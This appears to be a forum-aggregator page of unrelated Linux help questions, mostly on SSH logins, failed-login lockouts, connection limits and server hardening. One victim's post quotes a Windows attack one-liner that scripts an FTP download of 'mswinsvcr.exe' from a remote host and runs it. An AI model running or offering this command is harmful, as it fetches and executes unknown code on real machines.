Lastb often shows me a huge list of attempted ssh logins.Such as this excerpt:
Code:
admin ssh:notty Sat Sep 11 23:47 - 23:47 (00:00) 184-154-37-12.Huge-DNS.COM
root ssh:notty Sat Sep 11 23:47 - 23:47 (00:00) 184-154-37-12.Huge-DNS.COM
[code]....
I ran into a user today that indicated that their company only allows them to log in through a terminal session once (no multiple logins). On second try their login window terminates. They are using putty.Is this being accomplished through PAM or sshd ( or some other method)?
View 1 Replies View RelatedI need to transfer some massive amount of data (2.5terrabyte, many files, directory structure) to a embedded raid-box which has a minimal linux on it (some custom distro from western digital). We tried rsync (version 2.6.7), but it crashes because the filelist is too big for the ram available (fixed in later versions of rsync, but I don't know how to update, it's not debian based and there are no compiler tools). We tried nfs, but the max bandwidth produced is around 1 mb/sec (cpu bound?), so it'd take around 3 weeks this way. Samba has problems with big files (and we have some 20gb files in there).
SCP isn't installed, and would probably also be cpu bound due to encryption I think. So the only option left would be ftp, we're currently trying using ncftp with the command "put -R /path/to/data/" , but it's been running for over an hour, eating up most of the ram, and not using any bandwidth. I think it is still building a file list or something. FTP already worked for a single 20gb file with acceptable bandwidth of about 12mb/sec. Does anyone know a better ftp program (for console) that can start transferring some data or at least display an estimated time for the copy-preperation?
I'm writing a user ranking module for a site. This ranking depends on some criterias and it's possible to set or unset any one of these criterias in order to consider them in calculating the user rank or not. And here's the way I've implemented the ranking calculation :
when I set one or more of the criterias to be considered in ranking , for each user in the system I insert one record for each criteria , for example : if I have 2 criterias and both are set and consider that I have two users , I'll have :
Ranking table
--------------
username | criteria | to_be_added | score
--------------------------------------------------
user1 | criteria1 | 1 | 0
[code]....
It means I just set the to_be_added field to 1 for all of them and leave the calculation of score for each criteria for each user to the time the user logins so that to prevent doing all these calculations at once , because there are a huge number of users ... But there is one problem , if I want to show for example the best user (based on the highest score) , the result can't always be true because some users might not logged in at that time and their score might be zero .
I would like to detect every login on my server. Not only ssh logins (virtual terminals) but also physical logins.There is a way to use nagios or a script to watch log files.But I would like to know is there a way to catch that information one step before.I thought about watching /dev/pts for changes but that is not different than log watching and everything does not appear in /dev/pts like a ssh tunnel (ssh -N user@server). These are only visible in logs because ssh tunnels do not open terminals.But I would like to be able to catch these on login.
View 8 Replies View RelatedIs there a way to lock out logins at the console? I ask this because I can not login at the console but can remotely login to the system via ssh. I'm guessing I blindly implemented a security option and didn't know what I was doing when I did it.
View 2 Replies View RelatedHow do I monitor who is ssh'ing into a box (SLES) as well as failed attempts? How can I log their IP addresses, even if they're not in DNS?/var/log/messages I see their hostname but no IP address
View 13 Replies View RelatedI was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
I'm trying to secure the CentOS servers on our company network as the current situation is, shall we say, less-than-ideal: remote root logins with the same password across several servers (behind a firewall, on non-standard ports, but still) and several key processes running as root. My proposal to amend this consists of the following:
- setup a bare as possible SSH-gateway with only the normal user accounts to handle remote access
- disable the root login from anywhere else but LOCAL and create special accounts with root permissions for our ~4 system administrators, like admin.foo admin.bar that can only login from inside the company network, using SSH-keys.
So far my biggest obstacle seems to be creating the administrative users, how do I go about and do that? When I simply create a user adminfoo with uid=0 it will show on my shell as root, which makes it useless as a way to make our admins accountable for their actions. BTW, my initial proposal to use sudo unfortunately met with strong resistance, because it compromises usability.
I have been trying to get pam_tally2 to block failed logins with ssh. No matter how many failed logins I do I can still log in with the correct password using SSH. Anyone have this working?
Here are the configuration I am using. I have put this in sshd and password-auth-ac.
auth required pam_tally2.so deny=3 file=/var/log/tallylog lock_time=180 unlock_time=1200 magic_root account required pam_tally2.so magic_root In the /var/log/secure I do see messages related pam_tally2 and the counter going up.
Failed login attempts are logged to syslog with the user id or login id set to UNKNOWN_USER or UNSET.Anybody know if this is configurable. I would rather it just pass the actual id that the user used. Doesn't matter if it exist or not, just want to know if someone is guessing at user names and what those user names are
View 1 Replies View RelatedI've evaluated about 15 offline storage systems this week, and one of the best was spideroak, but there's a huge issue in their shared folder structure and procedure.When you make part of your data shareable you MUST share a folder from your original disk. This is a real pain. You cannot share specific files like you can on many others.To initiate sharing your establish your unique username for sharing (different preferably than your spideroak username) the share name, and the room key (password).While you might expect the share name to be part of the URL that guides you to the share which then accepts your password for access, thats not how it works. Instead spideroak gives you a URL that contains the PASSWORD and does not even mention the share name!!
Therefore anyone you give the URL to has direct access to the share you create (which is what you are trying to accomplish in general) but any browser THEY USE will remember the URL which contains the password, not the share name.THIS IS A HUGE SECURITY ISSUE since you have no control over how an authorized user is going to access your data and from where and most users are not sophisticated enough to guard against the default intrusion they are going to leave behind.
I'm tasked with creating a base image of ubuntu (one for server, one for workstation) that is locked down and has all the fluff taken out (naturally workstation will have more fluff left in it than server). Task list looks about like this:
1. Create list of deb packages "allowed", write script to list/uninstall everything else.
2. Hook the logins into either enterprise kerberos or Active Directory (yuck).
3. Write scripts to check things like setuid/setguid, disabling su, checking sudo permissions, configure iptables, etc.
4. Use a scanner to scan the system from outside the system (was thinking of using backtrace).
5. Custom-compile the kernel to strip out all the unneeded modules.
Before embarking on this awesome task I figured I'd check with you guys to see if you know of some resources that would make this task easier/quicker. I'm sure someone out there has already headed down this branch.
PS My boss *loves* ubuntu and isn't to keen on going with a deb (or other) distro that is already "security trimmed" without some serious convincing. I'm sure there are some out there, and if you want to pass along a couple for consideration, I'll check them out, but no guarantees he'll let me use it.
Dist: Fedora 14
SSHD: OpenSSH 5.5p1
I need to limit the number of ssh connections a user has. All the users are using tunnel only so their shell is set to /sbin/nologin The logins do not open a shell they just create the tunnel so /etc/security/limits.conf has no effect on them at all.
I tried setting 'MaxSessions 1' in sshd_config but either that doesn't not do what I expect it to or it plain does not work as even with a normal user I was able to open an unlimited number of sessions. I need a good secure way to limit each user to 1 ssh session without them having a shell but Im unable to find a solution.
Just noticed this, when I am logged into OpenSuse 11.3 under my default user (autologin) I have 3 of the same user logged in, eg when I run top it shows 3 users and when I run the users command it shows the same user 3 times. Is there any reason for this? Do I need to investigate this at all?
View 1 Replies View Relatedif i want user should`t have more than 20 sftp connections to a server,is there any way we can limit no.of connections to a particular user on the server using ssh configuration
View 7 Replies View RelatedI'm looking for a solution for sendmail to limit the number of emails send per miniute per IP. For example all my local computer user with ip 192.x.x.x need to able to send 10 emails/minite (emails, not connections!. The rest of the world can send for example 200 emails/minute to the mailserver. If the amount of emails per minute is exceeded, sendmail needs to block receiving emails from the spesific IP. I want to do this to stop spaming from my local network. Is it possible?
View 1 Replies View RelatedI have been forbidden to enable automatic updates on our Ubuntu servers, for both security and regular packages.When I log into any of my four Ubuntu servers, the welcome message contains this:
39 packages can be updated.
26 updates are security updates.
However, when I run the Nagios plugin that monitors APT, I get:
% /usr/lib/nagios/plugins/check_apt
APT WARNING: 33 packages available for upgrade (0 critical updates).
I need to know how to properly detect that there are pending security updates, and regular updates. Once I can do that, I plan to write a Nagios script that will return WARNING for pending regular updates, and CRITICAL for pending security updates.
I have a standard home set-up for my Ubuntu OS, and I would like to know whether its possible to cut out the repetitive prompts to enter the password, as when you connect to the internet or access files on a partition that's not home, or install new software.
View 1 Replies View Relatedi am using 9.10 karmic. Firewall is enabled. added ports with ufw allow [portnumber], and i still cannot connect to a port number. iv tryed ufw allow ssh/tcp but that does not work. the ports work when i disable the firewall and i dont want to do that.
ufw is available in all new installations of Ubuntu since 8.04 LTS, but is disabled by default. The standard Ubuntu installation has a no open service ports policy, so enabling the firewall by default doesn't gain any extra security in the default installation, but could provide confusion for people new to Ubuntu when new software that is installed does not work because of restrictive firewall rules. As a result, when first adding ufw to Ubuntu it was decided that users must 'opt-in' to using the firewall. In Ubuntu 9.04 and later, you can enable ufw during installation using preseeding. See /usr/share/doc/ufw/README.Debian for details.
I'd like to somehow connect a serial port to a headphone jack, plug it into the geiger counter and literally dump random noise from the geiger counter into the entropy pool used by /dev/random
View 7 Replies View RelatedHow to number of connections for a single ip on port 80 to CentOS 5.5 with iptables? connlimit did not work on CentOS and nginx does not provide a module for that
View 4 Replies View RelatedMy Linux server which is running my company website have been hacked. Today I saw a number of clients (customers) with some fun characters entries on my database. Access denial on really clients. Please assist, am running Linux Ubuntu 9 and I dont know where to start troubleshooting this. let me confession that I am still on the learning curve on Linux
View 8 Replies View RelatedI was searching around and I stumbled upon a Linux Kernelix Sockets Local Denial of Service exploit.I downloaded the exploit, compiled it ran it to check if I am vulnerable.As I was expecting, the exploit instantly "killed" my Maverick system and I had to use the power button to reset my computer...Is there any way to limit the numberof allowed open sockets?I don't think that this can be done using /etc/security/limits.conf in a similar way of preventing the fork bombs
View 1 Replies View RelatedIs there an ssh or sshd parameter that can be set to block out a user after a set number of attempts tp login ?
View 1 Replies View RelatedOur system is based on RH4 and is using pam_tally and faillog to record failed attempts and to lock users out after 5 attempts. We have a requirement to provide a normal (non-root) user logging onto our system, with information regarding the number of failed logon attempts made on their account before the current successful logon (similar to the functionality provided by HP Protect Tools on Windows). My first idea was to add 'faillog -u $USER' to the bashrc, however by the time the bashrc is run - the user has been successfully authenticated and the faillog has been reset back to zero.
View 5 Replies View Relatedi getting following error message plz help me to solve
[root@localhost a]# awk -f dream2.awk simple.tr >simple1.tr
awk: dream2.awk:29: (FILENAME=simple.tr FNR=53107) fatal: division by zero attempted
[root@localhost a]#
I followed this guide: [url] to try to switch to OSS. Now the sound doesn't work at all. How do I undo these changes and switch back to ALSA?
View 9 Replies View RelatedFor a special purpose I needed a initramfs - that didn't work. So I reduced the initramfs setup to the simplest.
Mount the root and switch_root into it. But that didn't work either.
If I go with the init-script for the initramfs I posted below the system prints out the switch_root usage-text from busybox. But the syntax is right, ain't it?
When I use chroot instead of switch_root then it prints the usage-text of init before the kernel panic.
If I try with "/sbin/init 5" then, after a while the system reports "init: timeout opening/writing control channel /dev/initctl".
In the other cases I get the following error messages before the system hangs: "Kernel Panic", "Attempted to kill init", "init not tainted"
(With the init script below there is a error saying:"sh: can't access tty; job control turned off". I know why it's there - but don't know if it is connected to this problem.)
This information may be important:
- The machine boots from a usb-harddisk
- /sbin/init on the new root is available
- the system on newroot is sane and runs perfect standalone (without initramfs)
- the system on newroot uses baselayout-2 with openrc
- busybox is built as static binary
- busybox version is v1.15.3
Here is the relevant data:
My uname -a on that machine:
Code:
Content of the initramfs:
Code:
I Downloaded the 6 CD's of CentOS installation , and I start install them on my machine :
Processor : Intel Pentium 4 -2.08 Ghz
Ram: 256 MB
cash :512kb
HDD: 80GB
(it is for home server purposes)
After the fourth disc the system ask to reboot the system ; so I restart it ok? What I get ? No OS. Just a long text :
I think the bootup run ok, then this line came out I think it reveal some thing that Pros will know it:
nash received SIGSEGV Backtrace :
[0x804fb35]
[0x488420]
[0x.........
[0x........
[0x......]
then
Kernel panic - not syncing: Attempted to kill init!
